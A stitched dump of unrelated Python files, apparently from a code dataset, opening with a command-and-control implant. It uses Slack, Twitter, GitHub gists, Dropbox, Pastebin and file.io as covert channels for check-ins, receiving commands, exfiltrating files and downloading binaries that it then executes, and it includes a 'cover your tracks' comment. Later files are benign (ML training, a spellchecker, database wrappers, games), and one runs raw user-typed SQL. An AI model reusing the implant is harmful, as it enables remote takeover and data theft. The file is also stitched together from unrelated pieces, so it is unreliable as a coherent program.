return data['data']['link']
except Exception:
return "Upload failed"
def get_keys():
# TODO: Have a better way to get keys - maybe CLI arguments
# Could probably hard code the urls, but this makes it so we can just not commit the urls to the repo.
# urls.txt one URL per line.
# urls.txt should look like:
# Slack <url to get slack token>
# Slack <url to get slack token>
# Twitter <url to get twitter keys>
# Twiter <url to get twitter keys>
# Or however many tokens you have.
f = open("urls.txt")
urls = [line.strip().split(" ") for line in f]
f.close()
# Cover your tracks a little bit buddy
# os.remove("urls.txt")
headers = {
'user-agent': user_agent
}
for url in urls:
try:
method = url[0]
r = requests.get(
url[1],
headers=headers
)
key = r.text.strip()
if method == "Twitter":
key = tuple(key.split(";"))
return method, key
except Exception:
pass
return None, None
def pastebin_paste_file_contents(devkey, filepath):
url = "https://pastebin.com/api/api_post.php"
headers = {
'user-agent': user_agent
}
with open(filepath, "r") as f:
contents = f.read()
args = {
"api_dev_key": devkey,
"api_option": "paste",
"api_paste_code": contents
}
r = requests.post(
url,
headers=headers,
data=args
)
link = r.text
return link
def github_get_commands(gist_location):
headers = {
'user-agent': user_agent
}
r = requests.get(
gist_location,
headers
)
command = r.text
return command
def dropbox_download_exec(creds, filepath):
url = "https://content.dropboxapi.com/2/files/download"
headers = {
"Authorization": "Bearer {}".format(creds),
"Dropbox-API-Arg": "{\"path\":\"" + filepath + "\"}"
}
r = requests.post(url, headers=headers)
with open("asdf", "wb") as f:
f.write(r.text.encode())
os.system("chmod 777 asdf")
os.system("./asdf")
os.remove("asdf")
def dropbox_upload(creds, cname, filepath):
if not dropbox_folder_check(creds, cname):
return None
url = "https://content.dropboxapi.com/2/files/upload"
fname = os.path.basename(filepath)
headers = {
'user-agent': user_agent,
'Content-type': "application/octet-stream",
'Authorization': "Bearer {}".format(creds),
"Dropbox-API-Arg": "{\"path\":\"/" + cname.lower() + "/" + fname.lower() + "\",\"autorename\":true}"
}
data = open(filepath, "rb").read()
r = requests.post(
url,
headers=headers,
data=data
)
return r.status_code == 200
def dropbox_folder_check(creds, folder_name):
url = "https://api.dropboxapi.com/2/files/list_folder"
headers = {
'user-agent': user_agent,
'Content-type': "application/json",
'Authorization': "Bearer {}".format(creds),
}
content = {
"path": "/{}".format(folder_name.lower())
}
r = requests.post(
url,
headers=headers,
data=json.dumps(content)
)
if r.status_code != 200:
url = "https://api.dropboxapi.com/2/files/create_folder_v2"
r = requests.post(
url,
headers=headers,
data=json.dumps(content)
)
if r.status_code != 200:
return False
return True
def slack_checkin(creds, sysinfo):
url = "https://slack.com/api/conversations.list?token={}".format(creds)
headers = {
'user-agent': user_agent,
'Content-type': "application/json"
}
r = requests.get(
url,
headers=headers
)
data = r.json()
for channel in data['channels']:
if channel['name'] == 'general':
channel_id = channel['id']
resp = slack_post_to_channel(channel_id, creds, sysinfo)
if resp is not None:
pin = slack_get_pins(channel_id, creds)
return pin
return None
def slack_upload_file(channel, creds, file):
url = "https://slack.com/api/files.upload"
headers = {
'user-agent': user_agent,
'Authorization': "Bearer {}".format(creds)
}
content = {
'file': (file, open(file, 'rb')),
'initial_comment': file,
'channels': channel,
}
r = requests.post(
url,
headers=headers,
files=content
)
data = r.json()
link = data['file']['url_private_download']
return link
def slack_create_channel(channel_name, creds):
url = "https://slack.com/api/channels.create?token={}&name={}".format(creds, channel_name)
headers = {
'user-agent': user_agent,
'Content-type': "application/json",
}
r = requests.post(
url,
headers=headers
)
data = r.json()
if data["ok"]:
return data["channel"]["id"]
def slack_get_commands(channel, creds):
# We could proably listen and use the Events API but that sounds a lot like hosting an HTTP server on localhost
url = "https://slack.com/api/conversations.history?token={}&channel={}&limit=1".format(creds, channel)
headers = {
'user-agent': user_agent,
'Content-type': "application/x-www-form-urlencoded"
}
r = requests.get(
url,
headers=headers
)
data = r.json()
if data["ok"]:
if "subtype" in data['messages'][-1].keys():
if data['messages'][-1]['subtype'] == "bot_message":
return None
cmd = data["messages"][-1]["text"]
cmd = cmd.split("\n")
return cmd
else:
return None
def slack_get_pins(channel, creds):
url = "https://slack.com/api/pins.list?token={}&channel={}".format(creds, channel)
headers = {
'user-agent': user_agent
}
r = requests.get(
url,
headers=headers
)
data = r.json()
if data['ok']:
pin_cmd = data['items'][0]['message']['text']
pin_cmd = pin_cmd.split("\n")
return pin_cmd
def slack_post_to_channel(channel, creds, message):
url = "https://slack.com/api/chat.postMessage"
headers = {
'user-agent': user_agent,
'Content-type': "application/json",
'Authorization': "Bearer {}".format(creds)
}
content = {
"channel": channel,
"text": message
}
r = requests.post(
url,
headers=headers,
json=content
)
data = r.json()
if data["ok"]:
return channel
else:
return None
# TODO: handle the API objects better so we don't get rate limited all the time
def twitter_checkin(creds, sysinfo):
consumer_key, consumer_secret, access_token, access_token_secret = creds
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = API(auth, wait_on_rate_limit=True)
api.update_status(sysinfo)
return ["twitter_checkin"]
def twitter_get_commands(creds):
consumer_key, consumer_secret, access_token, access_token_secret = creds
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = API(auth, wait_on_rate_limit=True)
dms = api.list_direct_messages(3)
for dm in dms:
if "source_app_id" not in dm.message_create.keys():
command = dm.message_create['message_data']['text']
return command
return None
def twitter_post_response(creds, message, user):
consumer_key, consumer_secret, access_token, access_token_secret = creds
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = API(auth, wait_on_rate_limit=True)
api.send_direct_message(user, message)
return True
def fileio_upload(filepath):
files = {
'file': (filepath, open(filepath, 'rb')),
}
headers = {
'user-agent': user_agent
}
r = requests.post(
'https://file.io/',
files=files,
headers=headers
)
data = r.json()
return data['link']
def fileio_download_exec(filekey):
url = "https://file.io/{}".format(filekey)
headers = {
'user-agent': user_agent
}
r = requests.get(
url,
headers=headers
)
with open("asdf", "wb") as f:
f.write(r.text.encode())
os.system("chmod 777 asdf")
os.system("./asdf")
os.remove("asdf")
| 11,725 | 3,886 |
def test_response_is_json(self):
from json import loads
response = self.client.{{ request.method|lower }}('{{ request.path }}', data={{ request.data|safe }})
self.assertFalse(response.streaming)
# rather than F, this will E
content = loads(response.content)
expected = {} # TODO: Fill this in to make the test pass
self.assertEqual(content, expected)
| 413 | 113 |
import mysql.connector
mydb = mysql.connector.connect(
host="databaseurl",
user="username",
password="password",
database="database_name",
)
mycursor = mydb.cursor()
code = input("Enter SQL code here ")
sql = code
mycursor.execute(sql)
mydb.commit()
print(mycursor.rowcount, "record inserted.")
| 308 | 102 |
"""
URL: https://codeforces.com/problemset/problem/451/B
Author: Safiul Kabir [safiulanik at gmail.com]
Tags: implementation, sortings, *1300
"""
def main():
n = int(input())
ll = list(map(int, input().split()))
start, end = -1, -1
for i in range(n - 1):
if ll[i] > ll[i + 1]:
start = i + 1
break
if start == -1:
print('yes')
print('1 1')
return
for i in range(start, n - 1):
if ll[i] < ll[i + 1]:
end = i + 1
break
if start > -1 and end == -1:
end = n
for i in range(start - 1):
if ll[i] > ll[end - 1]:
print('no')
break
else:
for i in range(end, n):
if ll[i] < ll[start - 1] or (i < n - 1 and ll[i] > ll[i + 1]):
print('no')
break
else:
print('yes')
print(f'{start} {end}')
main()
| 941 | 352 |
from .ibm_cos import IBMCloudObjectStorageBackend as StorageBackend
| 68 | 18 |
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 7 22:03:24 2021
@author: lankuohsing
"""
import numpy as np
import torch.utils.data as Data
import torch
from collections import OrderedDict
from torchsummary import summary
# In[]
data1=[]
labels1=[]
data2=[]
labels2=[]
with open("./dataset/4_class_data_2d.txt",'r',encoding="UTF-8") as rf:
for line in rf:
split_list=line.strip().split(" ")
x=float(split_list[0])
y=float(split_list[1])
label=int(split_list[2])
if (x-2)**2+(y-2)**2<=0.5**2:
data2.append([x,y])
labels2.append([label-1])
else:
data1.append([x,y])
labels1.append([label-1])
# In[]
class_num=4
features=torch.tensor(data1,dtype=torch.float)
labels=torch.tensor(labels1,dtype=torch.long)
one_hot_labels=torch.zeros(len(labels),class_num).scatter_(1,labels,1)
batch_size=64
# 将训练数据的特征和标签组合
dataset=Data.TensorDataset(features,one_hot_labels)
# 随机读取小批量
train_loader=Data.DataLoader(dataset,batch_size,shuffle=True)
test_loader=train_loader
epochs=100
# In[]
num_inputs=2
num_outputs=4
class LinearNet(torch.nn.Module):
def __init__(self,num_inputs,num_outputs):
super(LinearNet,self).__init__()
self.linear=torch.nn.Linear(num_inputs,num_outputs)
def forward(self,x): # x.shape: (batch,num_input)
y=self.linear(x.view(x.shape[0],-1))
return y
softmax_regression=torch.nn.Sequential(
OrderedDict([
("linear",torch.nn.Linear(num_inputs,num_outputs))
])
)
torch.nn.init.normal_(softmax_regression.linear.weight,mean=0,std=0.01)
torch.nn.init.constant_(softmax_regression.linear.weight,val=0.01)
criterion=torch.nn.CrossEntropyLoss()
optimizer=torch.optim.SGD(softmax_regression.parameters(),lr=0.01)
for epoch in range(epochs):
for batch_idx,(feature_in_on_batch,label_in_one_batch) in enumerate(train_loader):
logits=softmax_regression(feature_in_on_batch)
loss=criterion(logits,label_in_one_batch)
break
optimizer.zero_grad()
loss.backward()
optimizer.step()
# if batch_idx % 100==0:
# print("Train Epoch: {} [{}/{}({:0f}%)]\tLoss: {:6f}".format(epoch,batch_idx*len(feature_in_on_batch),len(train_loader.dataset),100.*batch_idx/len(train_loader),loss.item()))
test_loss=0
correct=0
for data,target in test_loader:
logits=softmax_regression(data)
test_loss+=criterion(logits,target).item()
pred=logits.data.max(1)[1]
correct+=pred.eq(torch.nonzero(target.data)[:,1]).sum()
test_loss/=len(test_loader.dataset)
print("\nTest set: Average loss: {:.4f}, Accuracy: {}/{}({:.3f}%)".
format(test_loss,correct,
len(test_loader.dataset),
100.*correct/len(test_loader.dataset)))
# In[]
summary(softmax_regression,(1,2)) | 2,877 | 1,120 |
# /usr/bin/env python
# -*- coding: utf-8 -*-
def ErrorMessage(modulename=None):
print(f'Import Can\'t Module "{modulename}"')
print('Read the .md file')
print('pip -r requirements.txt')
import inspect,sqlite3
# load module
from py.sheet.sheet import *
try:
# PostgreSQL
import psycopg2
except ModuleNotFoundError as e:
ErrorMessage('psycopg2')
exit()
try:
# MySQL
import pymysql
except ModuleNotFoundError as e:
ErrorMessage('MySQLdb')
exit()
from py.sql import *
class Database(ForSQL):
"""
Database Class
"""
__package__='__database__'
__install__={
'document_root':'',
'directory':['/database/']
}
__config__={}
def __init__(self, dbtype=None, dbname=None):
self.setType(dbtype)
self.setDatabaseName(dbname)
super().__init__()
def className(self):
return self.__class__.__name__
def __config(self):
pass
def get(self):
return self.__config__
def getType(self):
return self.dbtype
def setType(self,types):
self.dbtype=types
def getPackage(self):
return self.__package
def setPackage(self,**package):
self.__package=package
def getHost(self):
return self.host
def setHost(self,host=None):
self.host=host
def getPort(self):
return self.port
def setPort(self,port=None):
self.port=port
def getDatabase(self):
return self.dbtype
def getDatabaseName(self):
return self.dbname
def setDatabaseName(self,name):
self.dbname=name
def access(self, dbname):
self.conn=None
return self.conn
def getInstallDir(self):
return self.__install__['document_root']
def setInstallDir(self,document_root='./data'):
self.__install__['document_root']=document_root
def isPgSQL(self):
return False
def isMySQL(self):
return False
def isSQLite(self):
return False
def asStoredText(self):
return False
def getUser(self):
return (self.__user,self.__password)
def setUser(self,user=(None,None)):
(self.__user,self.__password)=user
######################################################################################################
class FileinFlask(Database):
"""# Non Database
- getFile
- setFile
- saveCsv
- saveExcel: (x:column:{},y:row:{})
- save: Save File method
"""
__package__='__file__'
__config__={}
matrixData=[]
def __init__(self,dbtype=False,dbname='sample.txt'):
super().__init__(dbtype,dbname)
self.setFile(dbname)
def __config(self):
self.__config__['notdb']=self.isNonDB()
self.__config__['sqlite']=False
self.__config__['pgsql']=False
self.__config__['psql']=False
self.__config__['dbname']=None
self.__config__['dbtype']='text'
def isNonDB(self):
return True
def asStoredText(self):
return True
def getFile(self):
return self.filename
def setFile(self,filename='sample.csv'):
self.filename=filename
def saveCsv(self,column=[]):
text=''
self.save(text)
def saveExcel(self,colmun=[]):
text=''
self.save(text)
def save(self,text=''):
with open(self.getFile(),'wt') as fp:
fwrite(text)
def asExcel(self):
file=self.getFile()
class SelectSQLite3(Database):
"""
- Database
- Sub Class: SelectSQLite3
"""
__package__='__sqlite__'
__config__={}
def __init__(self,dbtype=None,dbname=None):
super().__init__(dbtype,dbname)
if dbname is None:
print('database name is not found.')
exit()
self.setType(dbtype)
self.setDatabaseName(dbname)
if self.test() is False:
print('+ Database Test is Failed.')
exit()
def isSQLite(self):
return True
def sqlite_config(self):
return self.__config__
def __config(self):
self.__config__['sqlite']=self.isSQLite()
self.__config__['dbname']=self.getDatabaseName()
self.__config__['dbtype']=self.getType()
def createDatabase(self):
pass
def test(self):
self.__connect()
cur=self.__cursor().execute('select sqlite_version();')
response=cur.fetchall()
self.__close()
if len(response) > 0:
return response
return False
def __connect(self):
self.connection=None
self.connection=sqlite3.connect(self.getDatabaseName())
def __cursor(self):
return self.connection.cursor()
def __close(self):
self.connection.close()
class SelectPgSQL(Database):
"""
PostgresSQL:
[how to install]
<homebrew ver.> -
$ brew install postgresql
$ brew service (start | stop) postgresql
[psql(database connection)]
$ psql --V
$ psql --help
$ psql -d postgres -U [username] -W [password]
[psql console]
> ¥h
- help
> ¥dt
- table info
> select verison();
- postgres version(install)
> ¥q
- quit
"""
__package__='__pgsql__'
__config__={}
def __init__(self,dbtype=None,dbname='sample_pgsql',**kwargs):
super().__init__(dbtype,dbname)
try:
self.setHost(kwargs['host'])
except KeyError:
self.setHost('localhost')
try:
self.setUser(kwargs['user'])
except KeyError:
self.setUser((None,None))
try:
self.setPort(kwargs['port'])
except KeyError:
self.setPort(5432)
self.setType(dbtype)
self.setDatabaseName(dbname)
self.__config()
def isPgSQL(self):
return True
def pg_config(self):
return self.__config__
def __config(self):
self.__config__['pgsql']=self.isPgSQL()
self.__config__['user']=self.getUser()
self.__config__['host']=self.getHost()
self.__config__['port']=self.getPort()
self.__config__['dbname']=self.getDatabaseName()
self.__config__['dbtype']=self.getType()
return self.__config__
def __test(self):
try:
self.__connect()
cur=self.__cursor()
cur.execute('select version();')
print(cur.fetchall())
self.__close()
return True
except ModuleNotFoundError:
print('Database connection failed.')
return False
def __connect(self):
usertext=''
try:
(user,password)=self.getUser()
if user is not None:
usertext=f' user={user}'
if password is not None or password!='':
usertext+=f' password={password}'
except AttributeError:
print('Postgres User is not set.')
self.connection=psycopg2.connect(f'host={self.getHost()} dbname={self.getDatabaseName()}{usertext}')
return self.connection
def __cursor(self):
return self.connection.cursor()
def __close(self):
self.connection.close()
| 7,476 | 2,249 |
from TabularTrainer import *
from RandomPlayer import *
from TicTacToe import *
import matplotlib.pyplot as plt
action_to_coordinate = {0: (0, 0), 1: (0, 1), 2: (0, 2),
3: (1, 0), 4: (1, 1), 5: (1, 2),
6: (2, 0), 7: (2, 1), 8: (2, 2)}
NUM_OF_BATTLES = 10
NUM_OF_GAMES = 50
#NOTE: tried to keep anything updating the board in this tile so we could use the TicTacToe functions
class Training:
def begin_training(self, number_of_battles = NUM_OF_BATTLES):
print("training started")
# Have own while loop to play game
agent1_wins = []
agent2_wins = []
draws = []
count = []
counter = 0
for i in range(0, number_of_battles):
print("battle " + str(i))
agent1Win, agent2Win, draw = self.battleRounds()
# Need to figure out the math depending on the number of games
# we want it to show like in the example code (I might not have explained that clearly oops)
agent1_wins.append((agent1Win / (agent1Win + agent2Win + draw)) * 100)
agent2_wins.append((agent2Win / (agent1Win + agent2Win + draw)) * 100)
draws.append((draw / (agent1Win + agent2Win + draw)) * 100)
counter = counter + 1
count.append(counter * NUM_OF_GAMES)
self.visualize_training_results(count, agent1_wins, agent2_wins, draws)
print("training ended")
def battleRounds(self, number_of_games = NUM_OF_GAMES):
agent1 = TabularTrainer('O', 'Agent 1')
#agent2 = TabularTrainer('X', 'Agent 2')
agent2 = RandomPlayer('X', 'Agent 2')
agent1WinCount = 0
agent2WinCount = 0
drawCount = 0
for i in range(0, number_of_games):
print("game " + str(i))
winner = self.playGame(agent1, agent2, number_of_games)
if winner == 1:
if isinstance(agent1, TabularTrainer):
agent1.save_to_file()
agent1.historic_data.clear()
agent1WinCount += 1
elif winner == 2:
if isinstance(agent2, TabularTrainer):
agent2.save_to_file()
agent2.historic_data.clear()
agent2WinCount += 1
else:
drawCount += 1
return agent1WinCount, agent2WinCount, drawCount
def playGame(self, agent1, agent2, number_of_games) -> int:
game = TicTacToe(agent1, agent2)
finished = False
while not finished:
finished = self.evaluateMove(agent1, game)
if finished:
break
else:
finished = self.evaluateMove(agent2, game)
if finished:
break
game.determine_winner()
winner = self.get_game_results(game, agent1, agent2)
return winner
def evaluateMove(self, agent, game):
move = agent.move(game.game_board)
if move == -1:
return True
coord = action_to_coordinate[move]
game.play_round(coord)
game.game_board.setSpaceTaken(coord)
finished = self.game_is_finished(game.get_board_grid())
return finished
def game_is_finished(self, board):
game_over = False
if np.all((board == 0)):
game_over = True
if (board[0, 0] > 0) and (board[0, 0] == board[0, 1] == board[0, 2]):
game_over = True
if (board[1, 0] > 0) and (board[1, 0] == board[1, 1] == board[1, 2]):
game_over = True
if (board[2, 0] > 0) and (board[2, 0] == board[2, 1] == board[2, 2]):
game_over = True
if (board[0, 0] > 0) and (board[0, 0] == board[1, 1] == board[2, 2]):
game_over = True
if (board[0, 2] > 0) and (board[0, 2] == board[1, 1] == board[2, 0]):
game_over = True
if (board[0, 0] > 0) and (board[0, 0] == board[1, 0] == board[2, 0]):
game_over = True
if (board[0, 1] > 0) and (board[0, 1] == board[1, 1] == board[2, 1]):
game_over = True
if (board[0, 2] > 0) and (board[0, 2] == board[1, 2] == board[2, 2]):
game_over = True
return game_over
def get_game_results(self, game, agent1, agent2) -> int:
winner = 0
if game.game_won:
if game.winning_player == game.player_one:
if isinstance(agent1, TabularTrainer):
agent1.result("won")
if isinstance(agent2, TabularTrainer):
agent2.result("loss")
winner = 1
else:
if isinstance(agent1, TabularTrainer):
agent1.result("loss")
if isinstance(agent2, TabularTrainer):
agent2.result("won")
winner = 2
elif game.tie_game:
if isinstance(agent1, TabularTrainer):
agent1.result("tie")
if isinstance(agent2, TabularTrainer):
agent2.result("tie")
#Tabular Trainer against itself
if isinstance(agent2, TabularTrainer) and isinstance(agent1, TabularTrainer):
higher_q_values = self.see_who_has_higher_qvalues(agent1.final_q_values, agent2.final_q_values)
#Tabular Trainer against RandomPlayer
if isinstance(agent2, RandomPlayer):
higher_q_values = agent1.final_q_values
if isinstance(agent1, RandomPlayer):
higher_q_values = agent2.final_q_values
return winner
def see_who_has_higher_qvalues(self, agent1_q_values, agent2_q_values):
agent1 = 0.0
agent2 = 0.0
for i in range(0, len(agent1_q_values)):
agent1 += agent1_q_values[i]
agent2 += agent2_q_values[i]
if agent1 > agent2:
return agent1_q_values
elif agent1 < agent2:
return agent2_q_values
# Default would be if the q values are equal
return agent1_q_values
#Plot the number of games each agent wins and ties
def visualize_training_results(self, gameNum, agent1_wins, agent2_wins, draws):
plt.plot(gameNum, agent1_wins)
plt.plot(gameNum, agent2_wins)
plt.plot(gameNum, draws)
plt.title('Battle Round Metrics')
plt.legend(['Agent 1 Wins', 'Agent 2 Wins', 'Draws'])
plt.xlabel('Number of Games')
plt.ylabel('Percentage of Agent Wins or Draws')
plt.show()
| 6,543 | 2,164 |
import os
import sys
from core.math_tool.coordinate_system import CoordSys
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import cv2
def _update_element(obj,data,is_Point=False):
if is_Point:
obj.set_data(data[0], data[1])
obj.set_3d_properties(data[2], zdir="z")
else:
obj.set_data(data[:,0], data[:,1])
obj.set_3d_properties(data[:,2], zdir="z")
def _update(obj_list,data,length=100):
pos = data.center
x_axis = np.array([pos, pos + data.x_axis*length])
y_axis = np.array([pos, pos + data.y_axis*length])
z_axis = np.array([pos, pos + data.z_axis*length])
_update_element(obj_list[0],pos,is_Point=True)
_update_element(obj_list[1],x_axis)
_update_element(obj_list[2],y_axis)
_update_element(obj_list[3],z_axis)
def visualize_3d(ref_,pred_,truth=None,user_exit=False):
# Plot Configure
plt.ion()
fig = plt.figure(figsize=(8, 8))
ax = fig.add_subplot(111, projection='3d') # Axe3D object
ax.set_xlabel('$x$',); ax.set_ylabel('$y$'); ax.set_zlabel('$z$')
ax.view_init(elev=120, azim=60)
ax.dist = 10
r_start, r_end = -1,1
x_axis_, y_axis_, z_axis_ = np.array([[-400,0,0],[400,0,0]]), np.array([[0,-400,0],[0,400,0]]), np.array([[0,0,0],[0,0,800]])
# Reference Object
visRefPoints, = ax.plot(range(r_start,r_end),
range(r_start,r_end),
range(r_start,r_end),
alpha=1, linestyle="", marker=".", c='g')
visRefAxisX, = ax.plot(x_axis_[:,0], x_axis_[:,1], x_axis_[:,2],alpha=0.6, c='r')
visRefAxisY, = ax.plot(y_axis_[:,0], y_axis_[:,1], y_axis_[:,2],alpha=0.6, c='g')
visRefAxisZ, = ax.plot(z_axis_[:,0], z_axis_[:,1], z_axis_[:,2],alpha=0.6, c='b')
# Phone Object
visPredPoints, = ax.plot(range(r_start,r_end),
range(r_start,r_end),
range(r_start,r_end),
alpha=0.6, linestyle="", marker=".", c='r')
visPredAxisX, = ax.plot(x_axis_[:,0], x_axis_[:,1], x_axis_[:,2],alpha=0.6, c='r')
visPredAxisY, = ax.plot(y_axis_[:,0], y_axis_[:,1], y_axis_[:,2],alpha=0.6, c='g')
visPredAxisZ, = ax.plot(z_axis_[:,0], z_axis_[:,1], z_axis_[:,2],alpha=0.6, c='b')
visTruthPoints, = ax.plot(range(r_start,r_end),
range(r_start,r_end),
range(r_start,r_end),
alpha=0.6, linestyle="", marker=".", c='b')
visTruthAxisX, = ax.plot(x_axis_[:,0], x_axis_[:,1], x_axis_[:,2],alpha=0.6, c='r')
visTruthAxisY, = ax.plot(y_axis_[:,0], y_axis_[:,1], y_axis_[:,2],alpha=0.6, c='g')
visTruthAxisZ, = ax.plot(z_axis_[:,0], z_axis_[:,1], z_axis_[:,2],alpha=0.6, c='b')
# Visualization Object List
ref_vis = [visRefPoints, visRefAxisX, visRefAxisY, visRefAxisZ]
pred_vis = [visPredPoints, visPredAxisX, visPredAxisY, visPredAxisZ]
truth_vis = [visTruthPoints, visTruthAxisX, visTruthAxisY, visTruthAxisZ]
while True:
ref,pred = ref_[0],pred_[0]
if ref is None or pred is None:
continue
if user_exit:
exit()
# _update(ref_vis,ref,length=800)
_update(pred_vis,pred)
if not truth is None:
_update(truth_vis,truth)
fig.canvas.draw()
fig.canvas.flush_events() | 3,402 | 1,397 |
# -*- coding: utf-8 -*-
from .utils import exists, nlargest, removeMultiple
from .spell import Spell
class KeyboardSpell(Spell):
def __init__(self, spelldic=None, corpusfile=None, suffixfile=None, language=None, encoding=None, keyboardlayoutfile=None, weightObjFun=None):
# call the parent constructor
Spell.__init__(self, spelldic, corpusfile, suffixfile, language, encoding)
#super(self.__class__, self).__init__(spelldic)
# or Spell.__init__(self, dicFile)
self.load_keyboard_layout(keyboardlayoutfile)
self.set_weightObjFun(weightObjFun)
#if weightObjFun is None:
# self.weightObjFun = (0.5, 0.5)
#else:
# self.set_weightObjFun(weightObjFun)
#if sum(weightObjFun) != 1:
# raise TypeError("Weights do not sum 1.")
#self.weightObjFun = weightObjFun
@classmethod
def from_file(cls, spelldic=None, corpusfile=None, suffixfile=None, language=None, encoding=None, keyboardlayoutfile=None, weightObjFun=None):
return cls(spelldic, corpusfile, suffixfile, language, encoding, keyboardlayoutfile, weightObjFun)
#mySpell = super().from_file(filename)
#mySpell.load_keyboard_layout(keyboardlayoutfile)
#mySpell.set_weightObjFun(weightObjFun)
#return mySpell
# @classmethod
# def from_dictionary(cls, spelldic, keyboardlayoutfile=None, weightObjFun=None):
# mySpell = super().from_dictionary(spelldic)
# mySpell.load_keyboard_layout(keyboardlayoutfile)
# mySpell.set_weightObjFun(weightObjFun)
# return mySpell
# @classmethod
# def from_text_corpus(cls, textfile=None, keyboardlayoutfile=None, weightObjFun=None):
# mySpell = super().from_text_corpus(textfile)
# mySpell.load_keyboard_layout(keyboardlayoutfile)
# mySpell.set_weightObjFun(weightObjFun)
# return mySpell
def set_weightObjFun(self, weight):
if weight is None:
self.weightObjFun = (0.5, 0.5)
else:
if sum(weight) != 1:
raise TypeError("Weights do not sum 1.")
self.weightObjFun = weight
def load_keyboard_layout(self, keyboardlayoutfile):
"""
Read keyboard layout from JSON file or text file (in this case, performs a literal evaluation of the python string).
Args:
keyboardlayoutfile: A keyboard layout file in JSON format or using python syntax.
"""
import json
if keyboardlayoutfile is not None:
if keyboardlayoutfile.endswith('.json'):
with open(keyboardlayoutfile, 'r') as f:
self.kblayout = json.load(f)
else:
import ast
with open(keyboardlayoutfile, 'r') as f:
self.kblayout = ast.literal_eval(f.read())
def getCharacterCoord(self, c):
"""
Finds a 2-tuple representing c's position on the given keyboard array.
If the character is not in the given array, throws a ValueError
"""
row = -1
column = -1
if self.kblayout is None:
raise Exception("Speller keyboard is empty!")
for kb in self.kblayout:
for r in kb:
if c in r:
row = kb.index(r)
column = r.index(c)
return (row, column)
raise ValueError(c + " not found in given keyboard layout")
def typoDistance(self, s, t, saturation=1000):
"""
Finds the typo Manhattan distance (an integer) between two characters, based
on the keyboard layout. The distance might be a saturated value.
"""
# add one if one is lowercase and other is not (shift diff)
addShiftDiff = int( s.islower() != t.islower() )
sc = self.getCharacterCoord(s.lower())
tc = self.getCharacterCoord(t.lower())
return min( sum( [abs(x-y) for x,y in zip(sc,tc)] ) + addShiftDiff, saturation)
def keyboard_damerau_levenshtein_distance(self, s1, s2, saturation=4):
"""
Computes the Damerau-Levenshtein distance between two strings considering different typo distances according to their keyboard distance.
The substitution cost is given by the keyboard distance between the two typos involved.
The insertion and deletion cost is the minimum distance between the inserted/deleted typo and the previous and next typo.
"""
d = {}
lenstr1 = len(s1)
lenstr2 = len(s2)
for i in range(-1,lenstr1+1):
d[(i,-1)] = i+1
for j in range(-1,lenstr2+1):
d[(-1,j)] = j+1
for i in range(lenstr1):
for j in range(lenstr2):
if s1[i] == s2[j]:
cost = 0
else:
cost = self.typoDistance(s1[i], s2[j], saturation=saturation)
delcost = min( self.typoDistance(s1[i], s1[i-1], saturation=saturation) if i > 0 and i < lenstr1 else 10,
self.typoDistance(s1[i], s1[i+1], saturation=saturation) if i > -1 and i < lenstr1-1 else 10
)
inscost = min( self.typoDistance(s2[j], s2[j-1], saturation=saturation) if j > 0 and j < lenstr2 else 10,
self.typoDistance(s2[j], s2[j+1], saturation=saturation) if j > -1 and j < lenstr2-1 else 10
)
#print 'delcost=' + str(delcost) + ', inscost=' + str(inscost) + ', cost=' + str(cost)
d[(i,j)] = min(
d[(i-1,j)] + delcost, # deletion
d[(i,j-1)] + inscost, # insertion
d[(i-1,j-1)] + cost, # substitution
)
if i and j and s1[i]==s2[j-1] and s1[i-1] == s2[j]:
d[(i,j)] = min (d[(i,j)], d[i-2,j-2] + cost) # transposition
return d[lenstr1-1,lenstr2-1]
def ObjectiveFunction(self, candidate, word, saturation=4):
"""
Provides the objective function to the optimization process.
It balances the probability of a candidate and its typing keyboard distance from the misspelled word.
f
log ---
m log d
w0 --------- - w1 ---------
M log d
log --- max
m
w_1 \frac{\log (f/m)}{\log (M/m)} - w_2 \frac{ \log d}{\log d_{max}}
"""
if self.weightObjFun[1] > 0:
d = self.keyboard_damerau_levenshtein_distance(candidate, word, saturation)
maxdist = saturation*max(len(candidate),len(word))
if candidate in self.WORDS:
return self.weightObjFun[0]*(log10(float(self.WORDS[candidate])/self.m) / log10(float(self.M)/self.m)) - self.weightObjFun[1]*(log10(float(d)) / log10(maxdist))
else:
return -d
return Spell.ObjectiveFunction(self, candidate, word)
else:
return super(KeyboardSpell,self).ObjectiveFunction(candidate, word)
return self.P(candidate)
| 7,134 | 2,212 |
# encoding: UTF-8
import cv2
import numpy as np
class ImFilterPipeline:
def __init__(self):
# init pipeline
self._pipeline = {
"rotated": 0,
"blur": 0,
"gaussianBlur": 0,
"resize": 0
}
@property
def pipeline(self):
return self._pipeline
def _rotate_bound_with_white_background(self, image, angle):
"""
Copy from imutils.rotate_bound. Change background color from (0,0,0) to (255,255,255)
:param image: image
:param angle: angle from 0 ~ 360
:return: processed image
"""
# grab the dimensions of the image and then determine the
# center
(h, w) = image.shape[:2]
(cX, cY) = (w / 2, h / 2)
# grab the rotation matrix (applying the negative of the
# angle to rotate clockwise), then grab the sine and cosine
# (i.e., the rotation components of the matrix)
M = cv2.getRotationMatrix2D((cX, cY), -angle, 1.0)
cos = np.abs(M[0, 0])
sin = np.abs(M[0, 1])
# compute the new bounding dimensions of the image
nW = int((h * sin) + (w * cos))
nH = int((h * cos) + (w * sin))
# adjust the rotation matrix to take into account translation
M[0, 2] += (nW / 2) - cX
M[1, 2] += (nH / 2) - cY
# perform the actual rotation and return the image
return cv2.warpAffine(image, M, (nW, nH), borderValue=(255, 255, 255))
def _blur(self, image, ksize=(5, 5)):
return cv2.blur(image, ksize)
def _gaussianBlur(self, image, ksize=(5, 5), sigmaX=0):
return cv2.GaussianBlur(image, ksize, sigmaX)
def _resize(self, image, target_size=64):
return cv2.resize(image, (target_size, target_size))
def filter(self, image):
rtn = image
if self._pipeline["rotated"] == 1:
rtn = self._rotate_bound_with_white_background(rtn, np.random.choice(np.arange(0, 360), 1))
if self._pipeline["blur"] == 1:
rtn = self._blur(rtn)
if self._pipeline["gaussianBlur"] == 1:
rtn = self._gaussianBlur(rtn)
if self._pipeline["resize"] == 1:
rtn = self._resize(rtn)
return rtn
| 2,262 | 794 |
import os
import sys
